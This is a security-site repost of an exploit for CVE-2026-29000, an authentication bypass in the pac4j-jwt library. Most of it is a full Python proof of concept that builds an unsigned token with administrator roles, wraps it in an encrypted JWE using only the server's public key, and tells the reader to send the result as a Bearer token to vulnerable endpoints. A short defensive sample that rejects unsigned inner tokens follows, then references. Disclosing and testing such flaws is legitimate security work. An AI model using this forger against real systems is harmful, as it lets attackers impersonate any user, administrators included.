pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 JwtAuthenticator Authentication Bypass via JWE-wrapped PlainJWT
Summary: the pac4j-jwt library has an authentication bypass vulnerability (CVE-2026-29000) that lets an attacker who holds only the server's RSA public key forge a JWE-wrapped PlainJWT, bypassing signature verification and impersonating any user (including administrators). Affected versions are < 4.5.9, < 5.7.9 and < 6.3.3; fixed in 4.5.9, 5.7.9 and 6.3.3+.

2026-3-8 15:38:36 Author: cxsecurity.com (view original)


#!/usr/bin/env python3
# Exploit Title: pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 JwtAuthenticator Authentication Bypass via JWE-wrapped PlainJWT
# CVE: CVE-2026-29000
# Date: 2026-03-05
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.pac4j.org
# Software Link: https://github.com/pac4j/pac4j
# Affected: pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3
# Tested on: Python 3.12 with pyjwt + cryptography
# Category: Remote Authentication Bypass
# Platform: Java (pac4j-jwt library)
# Exploit Type: Proof of Concept
# CVSS: 10.0 (Critical)
# CWE: CWE-347 (Improper Verification of Cryptographic Signature)
# Description: Allows remote attackers with only the server's RSA public key to forge
#   authentication tokens by wrapping an unsigned PlainJWT in JWE (RSA-OAEP-256 + A256GCM),
#   bypassing signature verification and impersonating any user (including admins).
# Fixed in: pac4j-jwt 4.5.9, 5.7.9, 6.3.3+
#
# Usage:
#   python3 exploit.py
#
# Options:
#   (No command-line args needed in this standalone PoC version)
#
# Notes:
#   - Requires: pip install pyjwt cryptography
#   - This generates a malicious token locally; in a real attack you'd fetch the public key from the target's JWKS endpoint.
#   - For demo only — use responsibly and only on systems you own or have explicit permission to test.
#
# How to Use
#   Step 1: Run the script to generate a malicious JWE token
#   Step 2: Submit the token in an Authorization: Bearer <token> header to a vulnerable pac4j-jwt protected endpoint

import json
import os
from datetime import datetime, timedelta, timezone

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric.padding import MGF1, OAEP
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.hashes import SHA256
from jwt.utils import base64url_encode

print("CVE-2026-29000 - pac4j-jwt JwtAuthenticator auth bypass via JWE-wrapped PlainJWT (@banyamer_security)")

# Stand-in for the target's RSA key pair; the PoC only ever uses the public half.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()
public_pem = public_key.public_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PublicFormat.SubjectPublicKeyInfo,
).decode("utf-8")
print("[+] Public key (PEM) that attacker would use:\n")
print(public_pem)

malicious_claims = {
    "sub": "admin#override",
    "email": "[email protected]",
    "$int_roles": ["ROLE_ADMIN", "ROLE_SUPERUSER"],
    "iat": int(datetime.now(timezone.utc).timestamp()),
    "exp": int((datetime.now(timezone.utc) + timedelta(hours=1)).timestamp()),
}
print("\n[+] Malicious claims:")
print(json.dumps(malicious_claims, indent=2))

# Inner token: a PlainJWT (alg "none") with an empty signature segment.
header = {"alg": "none", "typ": "JWT"}
payload = base64url_encode(json.dumps(malicious_claims).encode()).decode()
unsigned_jwt = base64url_encode(json.dumps(header).encode()).decode() + "." + payload + "."
print("\n[+] Unsigned PlainJWT (inner token):\n" + unsigned_jwt)

# Outer JWE in compact serialization: RSA-OAEP-256 key wrap, A256GCM content encryption,
# cty "JWT" so the authenticator treats the plaintext as a nested token.
jwe_header = {"alg": "RSA-OAEP-256", "enc": "A256GCM", "typ": "JWE", "cty": "JWT"}
protected = base64url_encode(json.dumps(jwe_header).encode()).decode()

cek = os.urandom(32)  # 256-bit content encryption key for A256GCM
encrypted_key = public_key.encrypt(
    cek,
    OAEP(mgf=MGF1(algorithm=SHA256()), algorithm=SHA256(), label=None),
)
encrypted_key_b64 = base64url_encode(encrypted_key).decode()

iv = os.urandom(12)  # 96-bit GCM nonce
# AESGCM.encrypt returns ciphertext || 16-byte tag; the protected header is the AAD (RFC 7516).
sealed = AESGCM(cek).encrypt(iv, unsigned_jwt.encode(), protected.encode())
ciphertext, tag = sealed[:-16], sealed[-16:]

iv_b64 = base64url_encode(iv).decode()
ciphertext_b64 = base64url_encode(ciphertext).decode()
tag_b64 = base64url_encode(tag).decode()

jwe_token = ".".join([protected, encrypted_key_b64, iv_b64, ciphertext_b64, tag_b64])
print("\n[+] Malicious JWE token (submit this to vulnerable pac4j-jwt):\n")
print(jwe_token)
print("\n(length: {} chars)".format(len(jwe_token)))
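The check a fixed authenticator has to perform on the plaintext it recovers from a JWE, shown as an added example that is not pac4j's code: the inner token must be a signed JWS whose alg is on an allowlist, so a PlainJWT (alg none, empty signature) is rejected before any claim is read. HS256 and the key are constructed for illustration; the allowlist would hold the algorithms the deployment actually uses.

```python
import base64
import hashlib
import hmac
import json

ALLOWED_ALGS = {"HS256"}  # allowlist of accepted JWS algorithms; "none" is never in it

class TokenRejected(Exception):
    pass

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def make_hs256_token(claims: dict, key: bytes) -> str:
    head = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"

def validate_nested_jws(inner: str, key: bytes) -> dict:
    # Decrypting the JWE only proves the sender had the public key; trust comes from this JWS check.
    parts = inner.split(".")
    if len(parts) != 3:
        raise TokenRejected("inner token is not a three-part JWS")
    head, body, sig = parts
    alg = json.loads(b64url_decode(head)).get("alg")
    if alg not in ALLOWED_ALGS:  # rejects a PlainJWT ("none") and any unexpected alg
        raise TokenRejected(f"alg {alg!r} not allowed")
    if not sig:
        raise TokenRejected("missing signature")
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise TokenRejected("bad signature")
    return json.loads(b64url_decode(body))

def demo() -> dict:
    # Constructed sample: one signed token and one PlainJWT shaped like the PoC's inner token.
    key = b"constructed-demo-key"  # placeholder secret, not a real key
    signed = make_hs256_token({"sub": "alice", "$int_roles": ["ROLE_USER"]}, key)
    plain = b64url_encode(b'{"alg":"none","typ":"JWT"}') + "." + b64url_encode(b'{"sub":"admin#override"}') + "."
    result = {"signed_sub": validate_nested_jws(signed, key)["sub"]}
    try:
        validate_nested_jws(plain, key)
        result["plain_rejected"] = False
    except TokenRejected as err:
        result["plain_rejected"], result["reason"] = True, str(err)
    return result
```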

References:

https://www.pac4j.org/blog/security-advisory-pac4j-jwt-jwtauthenticator.html
https://www.vulncheck.com/advisories/pac4j-jwt-jwtauthenticator-authentication-bypass
https://www.codeant.ai/security-research/pac4j-jwt-authentication-bypass-public-key
https://nvd.nist.gov/vuln/detail/CVE-2026-29000 (once published)


Source: https://cxsecurity.com/issue/WLB-2026030011